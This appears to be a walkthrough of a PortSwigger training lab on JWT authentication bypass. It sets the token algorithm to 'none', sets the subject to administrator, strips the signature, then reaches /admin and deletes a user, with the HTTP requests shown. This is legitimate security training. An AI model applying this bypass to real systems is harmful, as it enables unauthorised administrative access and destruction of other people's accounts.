https://portswigger.net/web-security/jwt/lab-jwt-authentication-bypass-via-flawed-signature-verification
Last updated
This lab uses a JWT-based mechanism for handling sessions. The server is insecurely configured to accept unsigned JWTs.
To solve the lab, modify your session token to gain access to the admin panel at /admin, then delete the user carlos.
You can log in to your own account using the following credentials: wiener:peter
Go to login page and access as wiener user.
JWT extension reveal that there's a JWT token, obviously related to wiener user account
Send it to repeater and select JSON web Token tab to deep dive to it
Using JSON Web Token tab, modify the sub field inserting: "administrator" and add as alg: "none",
after that, go again into Pretty tab and change the id value to 'administrator': GET /my-account?id=administrator HTTP/2 and delete the signature of the cookie session (the last part):
click first on the Send button and then on Following redirection button
Now, we're authenticated as administrator!
Checking the response the admin panel's path is: /admin
so we can move there via a GET request: GET /admin HTTP/2
analyzing the response, we see that the request to delete the user Carlos is the following: GET /admin/delete?username=carlos HTTP/2
So, Send and click to Following redirection to delete it and complete the lab.
